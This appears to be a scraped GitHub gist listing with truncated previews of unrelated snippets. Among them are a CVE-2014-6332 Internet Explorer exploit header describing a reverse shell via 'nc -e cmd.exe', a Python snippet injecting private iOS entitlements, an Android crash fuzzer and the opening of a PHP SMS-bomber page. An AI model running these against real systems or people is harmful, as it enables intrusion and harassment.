This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| # preinstalled python is python2 | |
| filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent' | |
| evil = ''' | |
| <!---><!--> | |
| <key>platform-application</key> | |
| <true/> | |
| <key>com.apple.private.security.no-container</key> | |
| <true/> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The MIT License (MIT) | |
| Copyright (c) 2015 David Weinstein | |
| Permission is hereby granted, free of charge, to any person obtaining a copy | |
| of this software and associated documentation files (the "Software"), to deal | |
| in the Software without restriction, including without limitation the rights | |
| to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| copies of the Software, and to permit persons to whom the Software is | |
| furnished to do so, subject to the following conditions: |
worawit
/ cve-2014-6332_exploit.html
Last active
March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
k3170makan
/ AndroidManifestFuzzer
Last active
October 5, 2016 09:06
Nifty Little Bash Script for Fuzzing Application AndroidManifest.xml's
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Basic set up for an Application AndroidManifest Fuzzer | |
| #this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8 | |
| #this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/ | |
| #NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2) | |
| #NOTE: you should probably monitor $(adb logcat)||(/system/bin/gdbserver) for responsiveness to the issue | |
| APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR | |
| APP_PACKAGE_NAME="..." #<-- PACKAGE NAME | |
| APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME |
helayzhang
/ build_protobuf_android.sh
Created
February 16, 2014 13:47
Build Google Protobuf library for android development. With android ndk stand alone tool chains.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PREFIX=`pwd`/protobuf/android | |
| rm -rf ${PREFIX} | |
| mkdir ${PREFIX} | |
| export NDK=YOUR_NDK_ROOT | |
| # 1. Use the tools from the Standalone Toolchain | |
| export PATH=YOUR_NDK_STAND_ALONE_TOOL_PATH/bin:$PATH | |
| export SYSROOT=YOUR_NDK_STAND_ALONE_TOOL_PATH/sysroot |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $tel_no = $_GET['hm']; | |
| $c = $_GET['c']?$_GET['c']:0; | |
| $c++; | |
| ?> | |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>迷你轰炸台 - 短信炸弹 - BETA!</title> | |
| <?php |
jamiew
/ mp4box_hacks.sh
Created
March 7, 2013 18:56
Adding subtitles and audio tracks to an MP4 video with MP4Box
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add subtitle track | |
| MP4Box -add minecraft_uncut.srt:lang=eng:layout=0x60x0x-1:group=2:hdlr="sbtl:tx3g" Minecraft2_mobile.mp4 | |
| # Add audio track | |
| # 1. doesnt work in quicktime/itunes | |
| MP4Box -add commentary_audio.aac Minecraft2_mobile.mp4 | |
| # 2. supposed to work in quicktime/itunes but doesn't seem to; :name at least is definitely not supported | |
| MP4Box -add commentary_audio.aac:disable:group1:lang=en:name="Director's Commentary" Minecraft2_mobile.mp4 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Reflects the requests from HTTP methods GET, POST, PUT, and DELETE | |
| # Written by Nathan Hamiel (2010) | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| from optparse import OptionParser | |
| class RequestHandler(BaseHTTPRequestHandler): | |
| def do_GET(self): |